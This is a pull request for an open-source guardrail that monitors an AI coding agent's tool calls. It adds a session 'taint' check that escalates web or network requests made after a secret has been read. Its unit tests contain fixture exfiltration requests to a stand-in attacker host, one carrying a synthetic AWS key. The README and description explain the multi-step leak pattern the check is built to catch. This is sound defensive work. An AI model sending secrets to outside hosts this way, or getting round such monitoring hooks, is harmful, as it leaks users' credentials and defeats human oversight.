### PR TITLE
feat(hosthooks): taint-primary multi-step exfiltration floor (HK.5.2)

### DIFF
--- a/README.md
+++ b/README.md
@@ -217,7 +217,7 @@ The proxy above protects the tools you route *through* Doberman. To make Doberma
 
 `doberman hook pre` reads the tool call on stdin, runs Doberman's deterministic **objective floor** (path confinement, destructive commands, external-destination & secret-exfil, smuggled-token channels), and returns a decision: a routine action passes silently (Doberman is raise-only — it never strips the harness's own prompts), a sensitive one prompts you (`ask`), and a dangerous one is blocked (`deny`) with a redaction-safe reason.
 
-`doberman hook post` runs *after* a tool executes: it scans the tool's **output** for credential-like material — so a `Read`/`Bash`/MCP call that *returns* a secret is **blocked from reaching the model** (the secret is never echoed) — and records each call in a local, redacted decision history (groundwork for cross-call multi-step-injection defense). Both handlers **fail closed** and are import-light, so they add minimal latency to each call.
+`doberman hook post` runs *after* a tool executes: it scans the tool's **output** for credential-like material — so a `Read`/`Bash`/MCP call that *returns* a secret is **blocked from reaching the model** (the secret is never echoed) — and records each call — plus a sticky per-session **taint** marker when a secret enters context — in a local, redacted decision history. That taint powers a **multi-step exfiltration floor**: the *pre*-hook raises an egress (web/network/MCP) in a session that has already accessed a secret — `ask` (light/balanced) or a hard `deny` (strict/paranoid) — catching read-secret-then-send-it exfil that no single-call rule can see. Both handlers **fail closed** and are import-light, so they add minimal latency to each call.
 
 **Or let Doberman write it for you** — no hand-editing JSON:
 
@@ -328,7 +328,8 @@ Set a mode in `.doberman/policies.yaml` or via `doberman policy set-mode <mode>`
 - ✅ Host-harness integration: Claude Code `PreToolUse` + `PostToolUse` hooks (`doberman hook pre`/`post`) gate every built-in *and* MCP tool call — and scan tool **output** for leaked secrets — with no MCP reconfig; fail-closed, import-light, and recording a local redacted history
 - ✅ One-command onboarding: `doberman setup` (alertness + guardrails + auto-wires the hooks) · `install-hooks`/`uninstall-hooks`
 - ✅ Host-harness self-protection: an agent cannot disable the hooks by editing `.claude/settings.json` — the hook-install file is a blocked control-plane path (like `.doberman/`)
-- 📋 Host-harness, continued (containment architecture): cross-call multi-step prompt-injection floor over the local history · warm-daemon adaptive layer · honeytoken tripwire + session circuit-breaker
+- ✅ Host-harness containment (taint-primary): a sticky per-session taint ledger + a **multi-step exfiltration floor** — an egress in a session that already accessed a secret is raised (`ask`, or a hard `deny` in strict/paranoid), catching read-then-send exfil a single-call rule can't see
+- 📋 Host-harness, continued (containment architecture): deeper Bash-command egress parsing · entropy/fingerprint-confirmed BLOCK · warm-daemon adaptive layer · honeytoken tripwire + session circuit-breaker
 - 🛠 Cost observability — **CB.1 landed**: a redaction-safe `CostEvent` + local append-only meter (`doberman.storage.cost`), advisory and strictly off the decision path. Next: `CostObserver` plugin seam (CB.2) and a raise-only loop-anomaly detector (CB.3)
 - 📋 Enterprise platform: centralized control plane, dashboards, org policy, SSO/RBAC
 

--- a/src/doberman/hosthooks/claude_code.py
+++ b/src/doberman/hosthooks/claude_code.py
@@ -41,9 +41,9 @@ import json
 from typing import Any
 
 from doberman.config import load_mode
-from doberman.engine.decision_engine import PASS_STUB, decide
+from doberman.engine.decision_engine import PASS_STUB, decide, max_risk, max_verdict
 from doberman.engine.objective import ObjectiveGuardrail
-from doberman.models import Decision, EvalContext, Verdict
+from doberman.models import Decision, EvalContext, ReasonCode, Risk, SecurityObject, Verdict
 from doberman.proxy.normalize import normalize
 
 #: Claude Code built-in tools whose *action* we gate before execution. Pure reads
@@ -94,6 +94,15 @@ _REQUIRED_FIELD: dict[str, str] = {
 _HOOK_EVENT = "PreToolUse"
 _REASON = "Doberman [{verdict}]: {explanation} (reasons: {reasons}; action {action_id})"
 _FAILSAFE_REASON = "Doberman: failing closed — could not evaluate this action safely."
+
+#: HK.5.2 taint floor: modes where a tainted-session egress is BLOCKed outright
+#: rather than AUTH'd. Mirrors the lethal-trifecta hard block (ADR 0021): raise-only,
+#: strictest modes only — light/balanced keep the human in the loop.
+_STRICT_MODES: frozenset[str] = frozenset({"strict", "paranoid"})
+_FLOOR_EXPLANATION = (
+    "A secret entered this session's context earlier; this egress is a potential "
+    "multi-step exfiltration."
+)
 
 
 def to_normalize_input(
@@ -168,6 +177,8 @@ def evaluate_pre(payload: dict[str, Any]) -> dict[str, Any] | None:
 
         cwd = payload.get("cwd")
         repo_root = cwd if isinstance(cwd, str) and cwd else "."
+        raw_session = payload.get("session_id")
+        session_id = raw_session if isinstance(raw_session, str) and raw_session else None
 
         canonical, args = to_normalize_input(tool_name, tool_input)
         action = normalize(canonical, args)
@@ -181,11 +192,98 @@ def evaluate_pre(payload: dict[str, Any]) -> dict[str, Any] | None:
             metadata={"raw_arguments": args, "repo_root": repo_root},
         )
         decision = decide(action, ObjectiveGuardrail(), PASS_STUB, ctx)
+        # HK.5.2: taint-primary multi-step floor — raise an egress the per-call
+        # floor judged clean when the session already accessed a secret.
+        decision = _apply_taint_floor(action, decision, ctx.mode, repo_root, session_id)
         if decision.final_verdict is Verdict.PASS:
             return None  # raise-only: abstain, leaving the harness's native flow intact
         return _decision_payload(decision)
     except Exception:  # noqa: BLE001 — fail closed; never surface the payload in an error
         return _deny()
+
+
+def _apply_taint_floor(
+    action: SecurityObject,
+    decision: Decision,
+    mode: str,
+    repo_root: str,
+    session_id: str | None,
+) -> Decision:
+    """HK.5.2 — the taint-primary multi-step exfiltration floor (raise-only).
+
+    The objective floor judges each call in isolation, so a cross-call exfil —
+    read a secret in call N (HK.5.1 records ``secret_access`` taint), then send it
+    in call M whose own payload looks clean — slips through. When THIS action is an
+    egress and the session already holds ``secret_access`` taint, raise the verdict:
+    ``AUTH`` in light/balanced (human-in-the-loop) or ``BLOCK`` in strict/paranoid,
+    mirroring the single-call lethal-trifecta floor (ADR 0021/0024). **Raise-only** —
+    it never lowers a verdict or risk. Best-effort and light: one SQLite taint read,
+    only on the egress path, and any failure leaves the objective decision untouched.
+
+    Scope note: the egress signal is ``action.external_destination`` (what
+    ``normalize`` recognises — WebFetch, network requests, domain/MCP egress tools).
+    Deep Bash-command egress parsing is HK.5.6; entropy-on-egress and the read-vs-send
+    fingerprint match (→ confirmatory BLOCK) are HK.5.2b.
+    """
+    if action.external_destination is None:
+        return decision  # not an egress — nothing can leave through this action
+    if decision.final_verdict is Verdict.BLOCK:
+        return decision  # already maximally raised; skip the taint read
+    if not _session_holds_secret(repo_root, session_id):
+        return decision
+
+    floor_verdict = Verdict.BLOCK if mode in _STRICT_MODES else Verdict.AUTH
+    floor_risk = Risk.critical if floor_verdict is Verdict.BLOCK else Risk.high
+    reasons = list(dict.fromkeys([*decision.reason_codes, ReasonCode.multi_step_exfil]))
+    explanation = " ".join(
+        part for part in (decision.explanation.strip(), _FLOOR_EXPLANATION) if part
+    )
+    return decision.model_copy(
+        update={
+            "final_verdict": max_verdict(decision.final_verdict, floor_verdict),
+            "final_risk": max_risk(decision.final_risk, floor_risk),
+            "reason_codes": reasons,
+            "explanation": explanation,
+        }
+    )
+
+
+def _session_holds_secret(repo_root: str, session_id: str | None) -> bool:
+    """True iff this session has accumulated ``secret_access`` taint (a secret
+    entered its context) under the session or entity scope.
+
+    A light SQLite read on the egress path only. On any error it returns ``False`` —
+    it never *fabricates* taint (which would AUTH/BLOCK every egress). A degraded
+    taint store is the alarm-not-downgrade concern of HK.5.0c, not a place to
+    silently escalate here.
+    """
+    import asyncio  # lazy: keep the hook's module import light
+
+    from doberman.storage.taint import (  # lazy: light (no numpy/scipy/river)
+        TAINT_SECRET_ACCESS,
+        entity_scope,
+        read_taint,
+    )
+
+    scopes: list[str] = [session_id] if session_id else []
+    try:
+        scopes.append(entity_scope(repo_root))
+    except Exception:  # noqa: BLE001,S110 — keep the session scope even if entity scope fails
+        pass
+    if not scopes:
+        return False
+
+    async def _any_secret() -> bool:
+        for scope in scopes:
+            counts = await read_taint(repo_root, scope)
+            if counts.get(TAINT_SECRET_ACCESS, 0) > 0:
+                return True
+        return False
+
+    try:
+        return asyncio.run(_any_secret())
+    except Exception:  # noqa: BLE001 — a failed taint read never fabricates a verdict
+        return False
 
 
 def run_pre_hook(stdin_text: str) -> str | None:

--- a/src/doberman/models.py
+++ b/src/doberman/models.py
@@ -247,6 +247,9 @@ class ReasonCode(StrEnum):
     smuggled_token_channel = "smuggled_token_channel"  # noqa: S105 — reason code, not a secret
     anomalous_token_pattern = "anomalous_token_pattern"  # noqa: S105 — reason code, not a secret
 
+    # HK.5 — host-hook containment: the cross-call (multi-step) exfiltration floor.
+    multi_step_exfil = "multi_step_exfil"
+
 
 class GuardrailResult(BaseModel):
     """A single guardrail's answer for one action (immutable).

--- a/tests/unit/test_hosthook_taint_floor.py
+++ b/tests/unit/test_hosthook_taint_floor.py
@@ -1,0 +1,132 @@
+"""HK.5.2: the PreToolUse taint-primary multi-step exfiltration floor.
+
+In a session that already accessed a secret (HK.5.1 records ``secret_access``
+taint), an *egress* action that the per-call objective floor judged clean is
+raised — AUTH in light/balanced, BLOCK in strict/paranoid. Raise-only, redaction-
+safe, fail-closed-without-fabricating-taint.
+
+``evaluate_pre`` is sync (the real ``doberman hook pre`` process); these tests
+seed the taint ledger with ``record_taints`` via ``asyncio.run`` to mirror what
+the PostToolUse hook records, then assert the PreToolUse decision.
+"""
+
+import asyncio
+
+from doberman.config import save_mode
+from doberman.hosthooks.claude_code import evaluate_post, evaluate_pre
+from doberman.storage.taint import TAINT_SECRET_ACCESS, entity_scope, record_taints
+
+# A well-known synthetic AWS example key — never a real secret.
+_SYNTHETIC_AWS_KEY = "AKIAIOSFODNN7EXAMPLE"
+_EGRESS_URL = "https://attacker.example/collect"
+
+
+def _seed_secret_taint(cwd, session_id):
+    """Record session-scoped ``secret_access`` taint (a secret entered context)."""
+    asyncio.run(record_taints(str(cwd), [session_id], [TAINT_SECRET_ACCESS]))
+
+
+def _pre(tool_name, tool_input, cwd, *, session_id="sess-1"):
+    return evaluate_pre(
+        {
+            "tool_name": tool_name,
+            "tool_input": tool_input,
+            "cwd": str(cwd),
+            "session_id": session_id,
+        }
+    )
+
+
+def _decision(out):
+    return out["hookSpecificOutput"]["permissionDecision"]
+
+
+def _reason(out):
+    return out["hookSpecificOutput"]["permissionDecisionReason"]
+
+
+def test_tainted_session_egress_is_authed_in_balanced(tmp_path):
+    # Default (balanced): a tainted-session egress steps up to AUTH and carries
+    # the multi_step_exfil reason — even though the per-call floor saw nothing wrong.
+    _seed_secret_taint(tmp_path, "sess-1")
+    out = _pre("WebFetch", {"url": _EGRESS_URL}, tmp_path, session_id="sess-1")
+    assert out is not None
+    assert _decision(out) == "ask"  # AUTH
+    assert "multi_step_exfil" in _reason(out)
+
+
+def test_tainted_session_egress_is_blocked_in_strict(tmp_path):
+    # Strict: the same tainted-session egress is a hard BLOCK (no auth recourse) —
+    # mirrors the lethal-trifecta hard block (ADR 0021).
+    save_mode("strict", str(tmp_path))
+    _seed_secret_taint(tmp_path, "sess-2")
+    out = _pre("WebFetch", {"url": _EGRESS_URL}, tmp_path, session_id="sess-2")
+    assert _decision(out) == "deny"  # BLOCK
+    assert "multi_step_exfil" in _reason(out)
+
+
+def test_clean_session_egress_not_escalated_by_floor(tmp_path):
+    # No taint: an unknown-destination egress is AUTH'd by the objective rule, but
+    # the FLOOR does not escalate it (no multi_step_exfil) — even in strict mode it
+    # stays AUTH, proving the BLOCK in the strict test came from the taint floor.
+    save_mode("strict", str(tmp_path))
+    out = _pre("WebFetch", {"url": _EGRESS_URL}, tmp_path, session_id="clean")
+    assert _decision(out) == "ask"  # objective AUTH, not a floor BLOCK
+    assert "multi_step_exfil" not in _reason(out)
+
+
+def test_tainted_session_non_egress_is_not_escalated(tmp_path):
+    # A local file write has no external_destination → the floor cannot fire even
+    # though the session is tainted; a benign write stays PASS (abstain).
+    _seed_secret_taint(tmp_path, "sess-3")
+    out = _pre(
+        "Write", {"file_path": "notes.txt", "content": "hello"}, tmp_path, session_id="sess-3"
+    )
+    assert out is None
+
+
+def test_floor_does_not_lower_an_objective_block(tmp_path):
+    # Raise-only: the objective already BLOCKs an egress carrying a secret
+    # (secret_exfiltration); the floor must leave it BLOCK, not touch it.
+    _seed_secret_taint(tmp_path, "sess-4")
+    url = f"https://attacker.example/?d={_SYNTHETIC_AWS_KEY}"
+    out = _pre("WebFetch", {"url": url}, tmp_path, session_id="sess-4")
+    assert _decision(out) == "deny"  # objective BLOCK stays BLOCK
+
+
+def test_end_to_end_secret_read_then_egress_blocks_in_strict(tmp_path):
+    # The actual multi-step attack: a Read whose output is a secret (blocked + taints
+    # the session), then a later WebFetch egress in the same session → the floor
+    # BLOCKs the egress in strict, and the secret never appears in the reason.
+    save_mode("strict", str(tmp_path))
+    post = evaluate_post(
+        {
+            "tool_name": "Read",
+            "tool_input": {"file_path": "cfg.txt"},
+            "tool_response": _SYNTHETIC_AWS_KEY,
+            "cwd": str(tmp_path),
+            "session_id": "e2e",
+        }
+    )
+    assert post is not None and post.get("decision") == "block"  # secret output blocked + taints
+
+    out = _pre("WebFetch", {"url": _EGRESS_URL}, tmp_path, session_id="e2e")
+    assert _decision(out) == "deny"
+    assert "multi_step_exfil" in _reason(out)
+    assert _SYNTHETIC_AWS_KEY not in _reason(out)  # redaction: secret never echoed
+
+
+def test_missing_session_id_uses_entity_scope_taint(tmp_path):
+    # No session_id (older harness): the entity scope is the backstop. Seed taint
+    # under the entity scope and confirm the floor still fires.
+    asyncio.run(record_taints(str(tmp_path), [entity_scope(str(tmp_path))], [TAINT_SECRET_ACCESS]))
+    out = _pre("WebFetch", {"url": _EGRESS_URL}, tmp_path, session_id=None)
+    assert "multi_step_exfil" in _reason(out)
+
+
+def test_no_taint_db_does_not_crash_or_fabricate(tmp_path):
+    # A fresh repo with no taint store at all: read returns empty, the floor
+    # abstains (no fabricated taint) and the hook does not crash.
+    out = _pre("WebFetch", {"url": _EGRESS_URL}, tmp_path, session_id="fresh")
+    assert _decision(out) == "ask"  # objective AUTH only
+    assert "multi_step_exfil" not in _reason(out)


### PR DESCRIPTION
## Slice
- Feature / Slice: **HK.5.2** — taint-primary multi-step exfiltration floor (ADR 0024, Layer 1).
- Plan reference: ADR 0024 (`doberman-vault/Decisions/0024-hk5-containment-architecture.md`).
- **Stacked on HK.5.1 (#44)** — base is `feat/host-hooks/taint-substrate`. Merge after #44.

## What this PR does
HK.5.1 records *that* a secret entered a session's context (`secret_access` taint) but changes **no** verdict. HK.5.2 is the payoff: `evaluate_pre` now applies `_apply_taint_floor` after the objective decision —

> when the action is an **egress** (`external_destination` set) and the session already holds `secret_access` taint, **raise** the verdict — **AUTH** in light/balanced, **BLOCK** in strict/paranoid — with the new `ReasonCode.multi_step_exfil`.

This catches the classic cross-call exfil — *read a secret in call N, send it in call M whose own payload looks clean* — that no single-call rule can see. It is the multi-step sibling of the single-call lethal-trifecta floor (ADR 0021).

**Design:**
- **Raise-only** — never lowers a verdict/risk (`max_verdict`/`max_risk`); an egress the objective already BLOCKs stays BLOCK.
- **Core untouched** — the raise is localized in the hook adapter; the `decision_engine` and its `SUBJECTIVE_HARD_BLOCK_ALLOWLIST` are not modified.
- **Light + fail-safe** — one SQLite taint read, **only on the egress path**; a failed/missing read **abstains** (never *fabricates* taint → no AUTH/BLOCK storm). No `numpy`/`scipy`/`river`.

**Scope (deliberate split, noted in the docstring + checklist):** egress signal = what `normalize` recognises (WebFetch, network, domain/MCP egress). Deep **Bash-command** egress parsing → HK.5.6. **entropy-on-egress** + **read-vs-send fingerprint → confirmatory BLOCK** → HK.5.2b.

## Tests added (run in CI)
`tests/unit/test_hosthook_taint_floor.py` (9): balanced→AUTH, strict→BLOCK, clean-session no-escalation, non-egress skip, raise-only over an objective BLOCK, **end-to-end** secret-read→egress BLOCK + redaction, entity-scope fallback, no-DB fail-safe. Local: ruff/format/`lint-imports` clean; full suite green.

## Public-release safety (doberman-core only)
- [x] Nothing from the "not allowed" list — core mechanism, open + auditable.
- [x] Core builds/tests/runs with NO enterprise package installed.

## Security checklist
- [x] Fails closed on error / uncertainty — a failed taint read abstains; the objective floor still governs.
- [x] No secret / full path / unredacted prompt logged — the reason names only `multi_step_exfil` + a static explanation (test asserts the secret never appears).
- [x] Raise-only — the floor only ever raises; never lowers a verdict (tested against an objective BLOCK).
- [x] Every BLOCK/AUTH carries reason codes + a human explanation.
- [x] doberman-core does not import doberman_enterprise; policy core does not import doberman.proxy.

## Edge cases / Risks
- A *failed* taint read deliberately does **not** fabricate taint (would AUTH/BLOCK every egress) — alarm-on-degradation is HK.5.0c.
- FP profile: a benign "read a secret then make an unrelated web call" is AUTH (balanced) — intended HITL; strict/paranoid users opt into the hard BLOCK.
